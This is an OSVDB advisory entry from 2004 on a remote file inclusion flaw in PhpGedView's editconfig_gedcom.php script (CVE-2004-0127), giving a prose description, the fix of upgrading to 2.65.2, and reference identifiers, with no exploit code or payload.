PhpGedView editconfig_gedcom.php gedcom_config Variable Remote File Inclusion

2004-01-28T05:36:43
ID OSVDB:3768
Type osvdb
Reporter OSVDB
Modified 2004-01-28T05:36:43

Description

Vulnerability Description

PhpGedView contains a flaw that may allow a malicious user with administrative rights to include malicious PHP files. The issue is triggered when an attacker sends a specially-crafted URL request to the editconfig_gedcom.php script to specify a malicious file from a remote system. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Upgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PhpGedView contains a flaw that may allow a malicious user with administrative rights to include malicious PHP files. The issue is triggered when an attacker sends a specially-crafted URL request to the editconfig_gedcom.php script to specify a malicious file from a remote system. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

References:

Vendor URL: http://phpgedview.sourceforge.net/ Secunia Advisory ID:10753 Related OSVDB ID: 3769 Other Advisory URL: http://www.netvigilance.com/advisory0003 Keyword: netVigilance Security Advisory 3 Keyword: TC 17867 ISS X-Force ID: 14987 CVE-2004-0127